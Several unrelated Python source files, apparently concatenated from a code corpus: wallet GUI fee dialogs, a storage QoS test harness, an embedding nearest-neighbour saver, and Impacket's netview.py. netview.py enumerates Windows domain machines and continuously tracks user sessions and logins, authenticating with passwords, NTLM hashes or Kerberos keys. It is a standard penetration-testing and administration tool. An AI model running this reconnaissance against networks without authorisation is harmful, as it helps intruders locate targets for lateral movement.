def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
try:
if not self.wallet.add_transaction(tx.txid(), tx):
self.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
self.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
self.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), _("Transaction added to wallet history"))
return True
|
netview.py | #!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# beto (@agsolino)
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
# YOU HAVE TO BE ABLE TO RESOLV THE DOMAIN MACHINES NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
#
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from Queue import Queue
from time import sleep
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception, e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
elif self.__domain is not '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception, e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's gonna be a one shoot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in self.__targets.keys():
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException), e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception, e:
#import traceback
#traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who createad a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF = True
else:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
else:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
if printCRLF is True:
print
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who looged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
if printCRLF is True:
print
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print version.BANNER
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will '
'run in domain mode.')
parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info '
'from (one per line). If not specified script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '
'(default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '
'opened (default 1000)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups(
'')
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
|
vdbench_qos.py | import vdbench
import initiator
import json
import lib
import target
from datetime import datetime
from time import sleep
import asyncio
import threading
import pos
# TEST_0#_0#=["Test name",
# [limit_type(reset, bw, iops), limit_how(rate, value), limit_value(%, per volume value)],
# [ ... ]]
TEST_01_01 = ["Reset Throttling", ["reset", "", ""]]
TEST_01_02 = ["Reset Throttling", ["bw", "value", "100"],
["reset", "", ""]]
TEST_02_01 = ["Throttle Max BW to 10% of Base Performance", ["bw", "rate", "10"]]
TEST_02_02 = ["Throttle Max IOPS to 10% of Base Performance", ["iops", "rate", "10"]]
TEST_03_01 = ["Throttle Max BW to 50% of Base Performance", ["bw", "rate", "50"]]
TEST_03_02 = ["Throttle Max IOPS to 50% of Base Performance", ["iops", "rate", "50"]]
TEST_04_01 = ["Throttle Max BW 90% of Base Performance", ["bw", "rate", "90"]]
TEST_04_02 = ["Throttle MAX IOPS 90% of Base Performance", ["iops", "rate", "90"]]
TEST_05_01 = ["Throttle Max BW 150% of Base Performance", ["bw", "rate", "150"]]
TEST_05_02 = ["Throttle Max IOPS 150% of Base Performance", ["iops", "rate", "150"]]
TEST_06_01 = ["Throttle Max BW to Min Performance", ["bw", "value", "10"]]
TEST_06_02 = ["Throttle Max IOPS to Min Performance", ["iops", "value", "10"]]
TEST_07_01 = ["Throttle Both Max BW and Iops", ["bw", "rate", "20"],
["iops", "rate", "50"],
["bw", "rate", "50"],
["iops", "rate", "30"]]
TEST_08_01 = ["Throttle Each Volume with Different Value", ["bw", ["3"], ["50"]],
["iops", ["1-2", "4-5"], ["10", "20"]],
["bw", ["3"], ["50"]]]
rd_list = [r"seq_w,wd=seq,iorate=max,elapsed=33,interval=3,warmup=3,pause=5,forxfersize=\(128k\),forrdpct=\(0\),forthreads=\(4\)",
r"seq_r,wd=seq,iorate=max,elapsed=33,interval=3,warmup=3,pause=5,forxfersize=\(128k\),forrdpct=\(100\),forthreads=\(4\)",
r"rand_w,wd=rand,iorate=max,elapsed=36,interval=3,warmup=3,pause=5,forxfersize=\(4k\),forrdpct=\(0\),forthreads=\(128\)",
r"rand_r,wd=rand,iorate=max,elapsed=36,interval=3,warmup=3,pause=5,forxfersize=\(4k\),forrdpct=\(100\),forthreads=\(128\)"
]
def GetTestcaseList():
tc = [
TEST_01_01,
TEST_01_02,
TEST_02_01,
TEST_02_02,
TEST_03_01,
TEST_03_02,
TEST_04_01,
TEST_04_02,
TEST_05_01,
TEST_05_02,
TEST_06_01,
TEST_06_02,
TEST_07_01,
TEST_08_01
]
return tc
def GetWorkloadInfos():
workload_names = []
for rd in rd_list:
wl_name = rd.split(',', 1)
workload_names.append(wl_name[0])
workload_info = [workload_names, rd_list]
return workload_info
def play(json_targets, json_inits, json_scenario):
lib.printer.green(f"\n -- '{__name__}' has began --")
raw_date = datetime.now()
now_date = raw_date.strftime("%y%m%d_%H%M%S")
skip_workload = False
# validate arguments
if 0 == len(json_targets):
lib.printer.red(" TargetError: At least 1 target has to exist")
return
if 0 == len(json_inits):
lib.printer.red(" InitiatorError: At least 1 initiator has to exist")
return
# target prepare
targets = {}
for json_target in json_targets:
try:
target_obj = target.manager.Target(json_target)
target_name = json_target["NAME"]
except KeyError:
lib.printer.red(" TargetError: Target KEY is invalid")
return
if not target_obj.Prepare():
skip_workload = True
break
targets[target_name] = target_obj
# init prepare
initiators = {}
test_target = targets[next(iter(targets))]
for json_init in json_inits:
try:
init_obj = initiator.manager.Initiator(json_init)
init_name = json_init["NAME"]
except KeyError:
lib.printer.red(" InitiatorError: Initiator KEY is invalid")
return
if not init_obj.Prepare(True, test_target.subsystem_list):
skip_workload = True
break
initiators[init_name] = init_obj
# check auto generate
if "yes" != test_target.use_autogen:
lib.printer.red(f"{__name__} [Error] check [TARGET][AUTO_GENERATE][USE] is 'yes' ")
skip_workload = True
workload_list = GetWorkloadInfos()[0]
rd_list = GetWorkloadInfos()[1]
lib.printer.green(f" Qos Test With Vdbench Start")
testcase = GetTestcaseList()
first_init_key = list(initiators.keys())[0]
first_init = initiators[first_init_key]
# create vd file & run
first_init_vdbench = vdbench.manager.Vdbench(first_init.name, first_init.id, first_init.pw, first_init.nic_ssh, first_init.vdbench_dir, json_scenario['OUTPUT_DIR'])
first_init_vdbench.opt["size"] = "8g"
first_init_vdbench.CreateVdFile(initiators, rd_list, -1, True)
first_init_vdbench.run(True)
first_init_vdbench.CopyVdbenchTotalResult(True, workload_list)
base_perf = {}
base_perf = first_init_vdbench.GetBasePerformance(workload_list) # iops, MB/s
# run each test for each workload
# make vd file with only 1 workload
workload_count = len(workload_list)
for rd_idx in range(0, workload_count):
workload_name = workload_list[rd_idx]
prev_expected_value = {} # iops, MB/s
base_bw = prev_expected_value["bw"] = float(base_perf[workload_name]["bw"])
base_iops = prev_expected_value["iops"] = float(base_perf[workload_name]["iops"])
base_iops /= 1000.0 # kiops
print("\n")
lib.printer.green(f" === <Base Performance> IOPS: {base_iops} k, BW: {base_bw}MB/sec === ")
# Create Vdbench File
print(f" Run: {rd_list[rd_idx]}")
vd_disk_names = first_init_vdbench.CreateVdFile(initiators, rd_list, rd_idx)
for test in testcase:
print("\n")
lib.printer.green(f" **** TEST NAME : {test[0]} ****")
for sc in test[1:]:
print(f" {sc}")
validty = pos.qos.CheckTestValidity(test[0], sc)
if validty is False:
print(f" Invalid test : {sc}")
continue
applyAllVolume = (type(sc[1]) is not list)
# Get Qos Command Option
limit = {}
# case1) {"type": , "how": , "value": } case2) {"type: ", "1-2": 10, "4-5": 20}
limit = pos.qos.GetQosCommandOption(sc, base_perf[workload_name])
# Run Vdbench
vdbench_thread = threading.Thread(target=first_init_vdbench.run)
vdbench_thread.start()
sleep(1)
# Set Throttling
expected_value = 0
if applyAllVolume is True:
expected_value = pos.qos.SetQosToAllVolumes(test_target, limit) # kiops, MB/s
if limit["type"] == "iops" and expected_value != -1:
expected_value *= 1000
if limit["type"] == "reset" or expected_value > base_perf[workload_name][limit["type"]]:
expected_value = 0
else:
pos.qos.SetQosToEachVolumes(test_target, limit)
sleep(1)
# Wait for vdbench till done
vdbench_thread.join(timeout=60)
# Check Result
throttle_success = False
if applyAllVolume is True:
first_init_vdbench.CopyVdbenchTotalResult(False, [workload_name])
result_file = json_scenario['OUTPUT_DIR'] + "/" + workload_name + ".json"
[throttle_success, prev_expected_value] = pos.qos.CheckQosThrottled(result_file, limit["type"], expected_value, prev_expected_value, base_perf[workload_name])
else:
for key in initiators:
init = initiators[key]
volume_id_list = init.GetVolumeIdOfDevice(vd_disk_names[key])
throttle_success = pos.qos.CheckEachVolumeThrottled(key, limit, vd_disk_names[key], first_init_vdbench, workload_name, volume_id_list)
if throttle_success is False:
lib.printer.red(f" Failed to throttle to {expected_value}")
else:
lib.printer.green(f" Throttling success")
print("")
# Reset Qos After Each Test
limit = {"type": "reset", "how": "", "value": 0}
pos.qos.SetQosToAllVolumes(test_target, limit)
prev_expected_value["bw"] = float(base_perf[workload_name]["bw"])
prev_expected_value["iops"] = float(base_perf[workload_name]["iops"])
lib.printer.green(f" Qos Test With Vdbench End")
# init wrapup
for key in initiators:
initiators[key].Wrapup(True, test_target.subsystem_list)
# target warpup
for key in targets:
if not targets[key].Wrapup():
targets[key].ForcedExit()
if skip_workload:
lib.printer.red(f" -- '{__name__}' unexpected done --\n")
else:
lib.printer.green(f" -- '{__name__}' successfully done --\n")
|
nn_saver.py | '''
Get the top k nearest neighbors for a set of embeddings and save to a file
'''
import multiprocessing as mp
import tensorflow as tf
import numpy as np
import codecs
import os
from nearest_neighbors import NearestNeighbors
import pyemblib
from hedgepig_logger import log
class _SIGNALS:
HALT = -1
COMPUTE = 1
def KNearestNeighbors(emb_arr, node_IDs, top_k, neighbor_file, threads=2, batch_size=5, completed_neighbors=None):
'''docstring goes here
'''
# set up threads
log.writeln('1 | Thread initialization')
all_indices = list(range(len(emb_arr)))
if completed_neighbors:
filtered_indices = []
for ix in all_indices:
if not ix in completed_neighbors:
filtered_indices.append(ix)
all_indices = filtered_indices
log.writeln(' >> Filtered out {0:,} completed indices'.format(len(emb_arr) - len(filtered_indices)))
log.writeln(' >> Filtered set size: {0:,}'.format(len(all_indices)))
index_subsets = _prepareForParallel(all_indices, threads-1, data_only=True)
nn_q = mp.Queue()
nn_writer = mp.Process(target=_nn_writer, args=(neighbor_file, node_IDs, nn_q))
computers = [
mp.Process(target=_threadedNeighbors, args=(index_subsets[i], emb_arr, batch_size, top_k, nn_q))
for i in range(threads - 1)
]
nn_writer.start()
log.writeln('2 | Neighbor computation')
util.parallelExecute(computers)
nn_q.put(_SIGNALS.HALT)
nn_writer.join()
def _prepareForParallel(data, threads, data_only=False):
'''Chunks list of data into disjoint subsets for each thread
to process.
Parameters:
data :: the list of data to split among threads
threads :: the number of threads to split for
'''
perthread = int(len(data) / threads)
threadchunks = []
for i in range(threads):
startix, endix = (i*perthread), ((i+1)*perthread)
# first N-1 threads handle equally-sized chunks of data
if i < threads-1:
endix = (i+1)*perthread
threadchunks.append((startix, data[startix:endix]))
# last thread handles remainder of data
else:
threadchunks.append((startix, data[startix:]))
if data_only: return [d for (ix, d) in threadchunks]
else: return threadchunks
def _nn_writer(neighborf, node_IDs, nn_q):
stream = open(neighborf, 'w')
stream.write('# File format is:\n# <word vocab index>,<NN 1>,<NN 2>,...\n')
result = nn_q.get()
log.track(message=' >> Processed {0}/{1:,} samples'.format('{0:,}', len(node_IDs)), writeInterval=50)
while result != _SIGNALS.HALT:
(ix, neighbors) = result
stream.write('%s\n' % ','.join([
str(d) for d in [
node_IDs[ix], *[
node_IDs[nbr]
for nbr in neighbors
]
]
]))
log.tick()
result = nn_q.get()
log.flushTracker()
def _threadedNeighbors(thread_indices, emb_arr, batch_size, top_k, nn_q):
sess = tf.Session()
grph = NearestNeighbors(sess, emb_arr)
ix = 0
while ix < len(thread_indices):
batch = thread_indices[ix:ix+batch_size]
nn = grph.nearestNeighbors(batch, top_k=top_k, no_self=True)
for i in range(len(batch)):
nn_q.put((batch[i], nn[i]))
ix += batch_size
def writeNodeMap(emb, f):
ordered = tuple([
k.strip()
for k in emb.keys()
if len(k.strip()) > 0
])
node_id = 1 # start from 1 in case 0 is reserved in node2vec
with codecs.open(f, 'w', 'utf-8') as stream:
for v in ordered:
stream.write('%d\t%s\n' % (
node_id, v
))
node_id += 1
def readNodeMap(f, as_ordered_list=False):
node_map = {}
with codecs.open(f, 'r', 'utf-8') as stream:
for line in stream:
(node_id, v) = [s.strip() for s in line.split('\t')]
